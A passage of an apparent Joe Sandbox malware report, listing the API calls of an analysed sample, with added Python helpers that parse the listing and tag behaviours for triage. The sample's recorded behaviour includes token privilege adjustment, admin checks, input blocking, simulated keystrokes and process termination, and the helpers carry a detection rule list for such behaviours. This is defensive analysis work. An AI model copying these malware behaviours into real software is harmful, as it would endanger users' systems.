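)

@dataclass
class ApiCall:
    name: str
    module: str
    args: list                 # raw tokens such as "00000011" or "?"
    ref: str                   # call-site address
    subcall_of: "str | None"   # callee address when nested, else None

def parse_api_listing(text: str) -> list:
    """Return one list of ApiCall per 'APIs' header, in page order."""
    entries, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            entries.append(current)
            continue
        m = CALL_RE.match(line)
        if m is None or current is None:
            continue               # hashes, dump sources and other headers
        args = m.group("args")
        current.append(ApiCall(
            name=m.group("name"), module=m.group("module"),
            args=args.split(",") if args else [],
            ref=m.group("ref").upper(), subcall_of=m.group("sub")))
    return entries

# Documented Winsock constants for the first three socket() arguments.
ADDRESS_FAMILY = {2: "AF_INET", 23: "AF_INET6"}
SOCKET_TYPE = {1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW"}
PROTOCOL = {0: "default", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}

def decode_socket_args(args) -> tuple:
    """Name the socket() family, type and protocol; '?' becomes 'unknown'."""
    def lookup(table, tok):
        return "unknown" if tok == "?" else table.get(int(tok, 16), "0x" + tok)
    fam, typ, proto = args[:3]
    return lookup(ADDRESS_FAMILY, fam), lookup(SOCKET_TYPE, typ), lookup(PROTOCOL, proto)

# A rule fires when every listed API occurs in the entry (own calls or subcalls).
# Tag names and groupings are this example's own, not Joe Sandbox signature names.
RULES = [
    ("process enumeration", {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"}),
    ("token privilege adjustment", {"LookupPrivilegeValueW", "AdjustTokenPrivileges"}),
    ("debugger check", {"IsDebuggerPresent"}),
    ("synthetic mouse input", {"mouse_event"}),
    ("directory enumeration", {"FindFirstFileW", "FindNextFileW"}),
    ("socket bind", {"socket", "bind"}),
]

def tag_entry(calls: list) -> list:
    """Behaviour tags for one function, plus decoded socket() arguments."""
    names = {c.name for c in calls}
    tags = [tag for tag, needed in RULES if needed <= names]
    for c in calls:
        if c.name == "socket" and len(c.args) >= 3:
            tags.append("socket(%s)" % ", ".join(decode_socket_args(c.args)))
    return tags

def summarize(text: str) -> list:
    """(entry index, tags) for every entry that matched at least one rule."""
    out = []
    for i, calls in enumerate(parse_api_listing(text)):
        tags = tag_entry(calls)
        if tags:
            out.append((i, tags))
    return out
```

Run against the whole report text rather than SAMPLE to get one tagged line per function; subcall lines are kept as ordinary records with `subcall_of` set, so a rule such as process enumeration still fires when part of the chain sits in a callee. The socket decode turns the `(00000002,00000002,00000011,...)` arguments in the entry above into AF_INET, SOCK_DGRAM, IPPROTO_UDP, which is the detail a triager actually wants from that entry.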
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 000E51DA
                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 000E5238
                                        • SetErrorMode.KERNEL32(00000000), ref: 000E52A1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ErrorMode$DiskFreeSpace
                                        • String ID:
                                        • API String ID: 1682464887-0
                                        • Opcode ID: 92be8cebac8eef7f3cca6b0afad1823f7112ebe002d08afb5617dcf364d1dc00
                                        • Instruction ID: 13589a49cbf41713da592f0fda356047555f976789b079bbe9e139bf52b8e71e
                                        • Opcode Fuzzy Hash: 92be8cebac8eef7f3cca6b0afad1823f7112ebe002d08afb5617dcf364d1dc00
                                        • Instruction Fuzzy Hash: D1317C35A00608DFDB00DF54D884EADBBF4FF49318F048099E909AB3A2DB75E845CB90
                                        APIs
                                          • Part of subcall function 0008FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00090668
                                          • Part of subcall function 0008FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00090685
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000D170D
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000D173A
                                        • GetLastError.KERNEL32 ref: 000D174A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                        • String ID:
                                        • API String ID: 577356006-0
                                        • Opcode ID: 0efc8552c609d3f64a4aa508c2735637ae44a1bd57a37837b8c05fc58b2d8cbf
                                        • Instruction ID: e243e6d00dd017be1ec1ef101f27b705c3d313670c215f98a3ae100b2944328d
                                        • Opcode Fuzzy Hash: 0efc8552c609d3f64a4aa508c2735637ae44a1bd57a37837b8c05fc58b2d8cbf
                                        • Instruction Fuzzy Hash: 7711BFB2404305BFD718AF64DC86DABB7BDFB04714B20852EF49656651EB70BC418B60
                                        APIs
                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 000DD608
                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 000DD645
                                        • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 000DD650
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CloseControlCreateDeviceFileHandle
                                        • String ID:
                                        • API String ID: 33631002-0
                                        • Opcode ID: 49824208a852c182024d868404325fc919fc6d938f10b051951d71a29ce30898
                                        • Instruction ID: 60d516d3fce64110dd37f36a933b98bc75676837c0cea72c079c007ffad2775d
                                        • Opcode Fuzzy Hash: 49824208a852c182024d868404325fc919fc6d938f10b051951d71a29ce30898
                                        • Instruction Fuzzy Hash: 51113C75E05228BBDB208F959C45FAFBBBCEB45B50F108156F904E7290D6B08A058BE1
                                        APIs
                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 000D168C
                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 000D16A1
                                        • FreeSid.ADVAPI32(?), ref: 000D16B1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                        • String ID:
                                        • API String ID: 3429775523-0
                                        • Opcode ID: c147f8ea5bbd32c483bb66848392bb2520d471da0f95d8d524199aadd8172d19
                                        • Instruction ID: 492d97febd7c0c4c1ae4035336e257b43fabdec3dc7261d63e38fc84d84a5b57
                                        • Opcode Fuzzy Hash: c147f8ea5bbd32c483bb66848392bb2520d471da0f95d8d524199aadd8172d19
                                        • Instruction Fuzzy Hash: 11F0F475950309FBEB00DFE49D89AAEBBBCEB08604F504565F501E2181E774AA448AA0
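Added example, not part of the Joe Sandbox report: a small Python helper that parses API lines in the shape this listing prints them and decodes the constants an analyst otherwise checks by hand. Run on the entries above and later in the listing it shows that the DeviceIoControl at 000DD645 uses control code 0x2D1400, which is IOCTL_STORAGE_QUERY_PROPERTY (device type 0x2D FILE_DEVICE_MASS_STORAGE, function 0x500, METHOD_BUFFERED); the 0xC input and 0x28 output sizes match STORAGE_PROPERTY_QUERY and STORAGE_DEVICE_DESCRIPTOR, so the "communicates with device drivers" signature here is a drive property query, not a custom driver channel. The AllocateAndInitializeSid at 000D168C builds two sub-authorities 0x20 and 0x220 (32, 544); with the identifier authority assumed to be SECURITY_NT_AUTHORITY, since the report shows that pointer as "?", that is S-1-5-32-544, BUILTIN\Administrators, and paired with CheckTokenMembership it is the standard is-admin check. The lookup tables are deliberately minimal and the sample input is constructed from lines in this report.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample input: API lines copied in the shape the report prints them
# (DeviceIoControl, admin-SID, BlockInput and RaiseException entries plus one
# "Part of subcall" line, which has no argument list and no comma before "ref:").
SAMPLE = """\
• CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 000DD608
• DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 000DD645
• CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 000DD650
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 000D168C
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 000D16A1
• BlockInput.USER32(00000001), ref: 000EEABD
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008), ref: 000A6998
  • Part of subcall function 0008FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00090668
"""

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[\w@]+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Minimal lookup tables (assumed for this example; extend as needed).
KNOWN_IOCTLS = {(0x2D, 0x500): "IOCTL_STORAGE_QUERY_PROPERTY"}
METHODS = ["METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER"]
WELL_KNOWN_SIDS = {"S-1-5-32-544": "BUILTIN\\Administrators"}
NTSTATUS = {0xC000000D: "STATUS_INVALID_PARAMETER"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]   # captured hex values as int, '?' as None
    ref: int
    subcall_of: Optional[int] = None


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse '• Api.MODULE(args), ref: addr' lines; skip anything else."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [] if not raw or not raw.strip() else [
            None if a.strip() == "?" else int(a, 16) for a in raw.split(",")]
        sub = int(m.group("sub"), 16) if m.group("sub") else None
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16), sub))
    return calls


def decode_ioctl(code: int) -> dict:
    """Split a CTL_CODE: (DeviceType << 16) | (Access << 14) | (Function << 2) | Method."""
    dev, fn = code >> 16, (code >> 2) & 0xFFF
    return {"device_type": dev, "function": fn, "method": METHODS[code & 3],
            "access": (code >> 14) & 3, "name": KNOWN_IOCTLS.get((dev, fn), "unknown")}


def sid_from_allocate_args(args: List[Optional[int]], authority: int = 5) -> str:
    """Rebuild the SID from AllocateAndInitializeSid(pAuthority, count, sub0..sub7, ...).
    The authority pointer is not captured by the sandbox, so SECURITY_NT_AUTHORITY (5) is assumed."""
    count = args[1] if len(args) > 1 else None
    if count is None or not 1 <= count <= 8:
        raise ValueError("sub-authority count not captured")
    subs = args[2:2 + count]
    if any(s is None for s in subs):
        raise ValueError("sub-authority value not captured")
    return "S-1-%d-%s" % (authority, "-".join(str(s) for s in subs))


def triage(calls: List[ApiCall]) -> List[str]:
    """One finding per call that a reviewer would want decoded, in listing order."""
    findings = []
    apis = {c.api for c in calls}
    for c in calls:
        if c.api == "DeviceIoControl" and len(c.args) > 1 and c.args[1] is not None:
            d = decode_ioctl(c.args[1])
            findings.append(f"{c.ref:08X} DeviceIoControl 0x{c.args[1]:08X} = {d['name']} ({d['method']})")
        elif c.api == "AllocateAndInitializeSid":
            sid = sid_from_allocate_args(c.args)
            note = " + CheckTokenMembership: is-admin check" if "CheckTokenMembership" in apis else ""
            findings.append(f"{c.ref:08X} builds {sid} ({WELL_KNOWN_SIDS.get(sid, 'unknown SID')}){note}")
        elif c.api == "BlockInput" and c.args[:1] == [1]:
            findings.append(f"{c.ref:08X} BlockInput(TRUE): keyboard and mouse input blocked")
        elif c.api == "RaiseException" and c.args and c.args[0] is not None:
            findings.append(f"{c.ref:08X} RaiseException {NTSTATUS.get(c.args[0], hex(c.args[0]))}")
    return findings


if __name__ == "__main__":
    for line in triage(parse_api_lines(SAMPLE)):
        print(line)
```

The parser is deliberately tolerant of the two line shapes the report uses, and `sid_from_allocate_args` refuses to guess when a sub-authority was not captured, since a wrong SID is worse than none.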
                                        APIs
                                        • GetCurrentProcess.KERNEL32(000A28E9,?,00094CBE,000A28E9,001388B8,0000000C,00094E15,000A28E9,00000002,00000000,?,000A28E9), ref: 00094D09
                                        • TerminateProcess.KERNEL32(00000000,?,00094CBE,000A28E9,001388B8,0000000C,00094E15,000A28E9,00000002,00000000,?,000A28E9), ref: 00094D10
                                        • ExitProcess.KERNEL32 ref: 00094D22
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
                                        • API String ID: 1703294689-0
                                        • Opcode ID: a839483eda70a1f91b5056a7a0b277ffe1b8599ece87e2182085cd4edf2e82a5
                                        • Instruction ID: 433e6f9b70b787221a58bbce53a169009497215a9a5611675826ab57dd234d56
                                        • Opcode Fuzzy Hash: a839483eda70a1f91b5056a7a0b277ffe1b8599ece87e2182085cd4edf2e82a5
                                        • Instruction Fuzzy Hash: 07E0B635015148ABCF15AF54DD09E983B69FB46781B108114FC458A523CB75DD82DE80
                                        APIs
                                        • GetUserNameW.ADVAPI32(?,?), ref: 000CD28C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: NameUser
                                        • String ID: X64
                                        • API String ID: 2645101109-893830106
                                        • Opcode ID: f91ab993ad11dd1327e3843cff608302aea2781799642c6796d8ec523dbd45c4
                                        • Instruction ID: 9be90e9cb0484676547d1d785ff98cf2eb2ecb5badd8e7572bf4d67c990313ae
                                        • Opcode Fuzzy Hash: f91ab993ad11dd1327e3843cff608302aea2781799642c6796d8ec523dbd45c4
                                        • Instruction Fuzzy Hash: 88D0C9B480111DEACBA4DB90DC88EDDB37CBB14305F100256F146A2140D77095499F10
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                        • Instruction ID: 484f834056c0be9c8fe20615ff8d9ffac3c1738b7f3b7005c2a2e7e6eed841ac
                                        • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                        • Instruction Fuzzy Hash: 1D022D71E012199FEF14CFA9C890AADFBF1EF48314F258169D819E7381D731AA41DB94
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?), ref: 000E6918
                                        • FindClose.KERNEL32(00000000), ref: 000E6961
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID:
                                        • API String ID: 2295610775-0
                                        • Opcode ID: 6cfe01698328bf0cd73b1014b0ddd3b3aede215fb389d4cf204ce1ce346867cc
                                        • Instruction ID: 171bc83946cc0130f9f0ec22a7cbf3239a0aa2083d11d6c01373903a235933c6
                                        • Opcode Fuzzy Hash: 6cfe01698328bf0cd73b1014b0ddd3b3aede215fb389d4cf204ce1ce346867cc
                                        • Instruction Fuzzy Hash: 1E11BE316042409FD710DF2AD484A1ABBE5EF85328F14C6A9F4699F6A3CB35EC45CB90
                                        APIs
                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,000F4891,?,?,00000035,?), ref: 000E37E4
                                        • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,000F4891,?,?,00000035,?), ref: 000E37F4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ErrorFormatLastMessage
                                        • String ID:
                                        • API String ID: 3479602957-0
                                        • Opcode ID: 46852e5396a35e2523f7f1d1a4a0528c85ed239076ee9b7065528fbb7126564d
                                        • Instruction ID: 4db4b28bd845081df9810690fdd71a0905ec3c1cded1f115e56f7e9ba335eb97
                                        • Opcode Fuzzy Hash: 46852e5396a35e2523f7f1d1a4a0528c85ed239076ee9b7065528fbb7126564d
                                        • Instruction Fuzzy Hash: EDF0E5B06052292AEB2017678C4DFEB3AAEEFC4761F000275F509E3681D9A09944CAF0
                                        APIs
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 000DB25D
                                        • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 000DB270
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: InputSendkeybd_event
                                        • String ID:
                                        • API String ID: 3536248340-0
                                        • Opcode ID: d405195b91607709602f36acda7fa937e9bc24bdc4b371e5e61a494cce0bbd05
                                        • Instruction ID: 27f7dcb851412d2c73502b16f6861fbc414034d24cb23029ec1b39eb9a797a60
                                        • Opcode Fuzzy Hash: d405195b91607709602f36acda7fa937e9bc24bdc4b371e5e61a494cce0bbd05
                                        • Instruction Fuzzy Hash: E7F01D7590428EABDB159FA0C805BBE7BB4FF04305F00800AF955A5191C7B986519FA4
                                        APIs
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,000D11FC), ref: 000D10D4
                                        • CloseHandle.KERNEL32(?,?,000D11FC), ref: 000D10E9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: AdjustCloseHandlePrivilegesToken
                                        • String ID:
                                        • API String ID: 81990902-0
                                        • Opcode ID: 984e7fa08a5e2612314494ef62da5a7550373055b2ecebcfadae2974db0c2240
                                        • Instruction ID: f253a06c64b10a33b7abebd3c28e3629b39f36c49eedfdbc990e91500bc6c8ae
                                        • Opcode Fuzzy Hash: 984e7fa08a5e2612314494ef62da5a7550373055b2ecebcfadae2974db0c2240
                                        • Instruction Fuzzy Hash: BBE01A32014601AEE7252B21FC05EB37BA9FB04310B10892EB5A5808B1DAA26CE0DB50
                                        APIs
                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,000A6766,?,?,00000008,?,?,000AFEFE,00000000), ref: 000A6998
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ExceptionRaise
                                        • String ID:
                                        • API String ID: 3997070919-0
                                        • Opcode ID: b1c63c941c9d5fe820fe1b8648651487481741389c5e52a98539f524cc1466cb
                                        • Instruction ID: 1e9d5cd0a70b49720b8491f3ce4942de174ca58469cf1e2bf0fcae71170e7bcc
                                        • Opcode Fuzzy Hash: b1c63c941c9d5fe820fe1b8648651487481741389c5e52a98539f524cc1466cb
                                        • Instruction Fuzzy Hash: 30B13D31610608DFD755CF68C48AB697BF0FF46364F298658E89ACF2A2C736D991CB40
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: 14f703a0d1376c5989b161b1c47bfa681bccaa93987ad99cb9bf95a97c11f97d
                                        • Instruction ID: c254b0aee58229048da1b402e33420af12788e7b008d06909c9a736dd62e1c44
                                        • Opcode Fuzzy Hash: 14f703a0d1376c5989b161b1c47bfa681bccaa93987ad99cb9bf95a97c11f97d
                                        • Instruction Fuzzy Hash: 25125F719002299BDB64DF58C881BEEB7F5FF48710F1481AAE849EB251DB709E81CB94
                                        APIs
                                        • BlockInput.USER32(00000001), ref: 000EEABD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: BlockInput
                                        • String ID:
                                        • API String ID: 3456056419-0
                                        • Opcode ID: 0ab83952e47d4fe5ce6df4b8a59e37cc6662de0daf3470d69d55741022f80b74
                                        • Instruction ID: 5c5af7bc6e8873986b2bf1eb5e99e9e08b8a1c1d5e5c9a760a0dd31edc990497
                                        • Opcode Fuzzy Hash: 0ab83952e47d4fe5ce6df4b8a59e37cc6662de0daf3470d69d55741022f80b74
                                        • Instruction Fuzzy Hash: 7BE04F312002049FD710EF6AD804E9AF7E9AF98760F04C42AFC49D7391DBB4F8408B91
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,000903EE), ref: 000909DA
                                        Memory Dump Source
